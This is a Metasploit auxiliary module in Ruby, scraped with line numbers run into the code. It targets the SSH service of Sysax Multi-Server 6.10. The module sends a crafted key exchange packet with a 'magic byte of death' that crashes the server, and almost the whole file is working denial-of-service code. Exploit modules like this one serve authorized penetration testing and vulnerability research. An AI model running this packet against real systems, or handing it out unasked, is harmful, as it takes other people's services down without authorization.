Path: blob/master/modules/auxiliary/dos/windows/ssh/sysax_sshd_kexchange.rb
19516 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::Tcp7include Msf::Auxiliary::Dos89def initialize(info = {})10super(11update_info(12info,13'Name' => 'Sysax Multi-Server 6.10 SSHD Key Exchange Denial of Service',14'Description' => %q{15This module sends a specially-crafted SSH Key Exchange causing the service to16crash.17},18'Author' => 'Matt "hostess" Andreko <mandreko[at]accuvant.com>',19'License' => MSF_LICENSE,20'References' => [21[ 'OSVDB', '92081'],22[ 'URL', 'https://www.mattandreko.com/2013/04/sysax-multi-server-610-ssh-dos.html']23],24'DisclosureDate' => '2013-03-17',25'Notes' => {26'Stability' => [CRASH_SERVICE_DOWN],27'SideEffects' => [],28'Reliability' => []29}30)31)3233register_options(34[35Opt::RPORT(22),36OptString.new('CLIENTVERSION', [ true, 'The SSH client version to report.', 'Debian-5ubuntu1'])37]38)39end4041def get_packet42delimiter = "\x00" * 343packet = [440x00, 0x00, 0x03, 0x14, 0x08, 0x14, 0xff, 0x9f,450xde, 0x5d, 0x5f, 0xb3, 0x07, 0x8f, 0x49, 0xa7,460x79, 0x6a, 0x03, 0x3d, 0xaf, 0x55, 0x00, 0x00,470x00, 0x7e48].pack('C*')49packet << Rex::Text.rand_text_alphanumeric(126)50packet << delimiter51packet << Rex::Text.rand_text_alphanumeric(16)52packet << delimiter53packet << Rex::Text.rand_text_alphanumeric(158)54packet << delimiter55packet << Rex::Text.rand_text_alphanumeric(158)56packet << delimiter57packet << Rex::Text.rand_text_alphanumeric(106)58packet << delimiter59packet << Rex::Text.rand_text_alphanumeric(106)60packet << delimiter61packet << "\x28" # Magic byte of death - seems to work with just about62# anything except \x1a, the value it's supposed to be63packet << Rex::Text.rand_text_alphanumeric(26)64packet << delimiter65packet << Rex::Text.rand_text_alphanumeric(27)66packet << delimiter * 767end6869def run70connect7172banner = sock.get_once || ''73print_status("Banner: #{banner.strip}")74sock.put('SSH-2.0-OpenSSH_5.1p1 ' + datastore['CLIENTVERSION'] + "\r\n" + get_packet)7576# Sometimes the socket closes faster than it can read, sometimes it doesn't, so catch the error just in case.77begin78sock.get_once79rescue Errno::ECONNRESET => e80vprint_error(e.message)81end8283disconnect84end85end868788